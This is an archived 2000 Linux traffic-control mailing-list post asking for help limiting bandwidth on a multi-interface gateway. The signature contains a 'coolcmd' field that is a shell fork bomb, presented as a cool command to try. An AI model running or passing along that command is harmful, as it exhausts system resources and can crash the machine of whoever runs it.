From mboxrd@z Thu Jan 1 00:00:00 1970 From: Thomas Habets thomas@habets.pp.se Date: Wed, 22 Nov 2000 00:00:08 +0000 Subject: [LARTC] Bandwidth limiting Message-Id: List-Id: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit To: lartc@vger.kernel.org
Hello.

I need help with limiting bandwidth. I have read every tutorial I've come 
over and I just can't make anything work.

Ok, here's the scenario:

I have a gateway, which has five network interfaces (eth0 -> eth4), eth0 is 
the 'external' one and eth[1-4] are supposed to be limited to 128Kbit/s each. 

The interfaces eth[1-4] each have a C-class net, 192.168.[1-4].0/24.

Thanks for any and all help.

linux 2.4.0-test9
debian 2.2 (potato)

---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "thomas@habets.pp.se" };
  char kernel[]    = { "Linux 2.2" };
  char *pgpKey[]   = { "finger -m thompa@darkface.pp.se" };
  char pgpfinger[] = { "6517 2898 6AED EA2C 1015  DCF0 8E53 B69F 524B B541" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;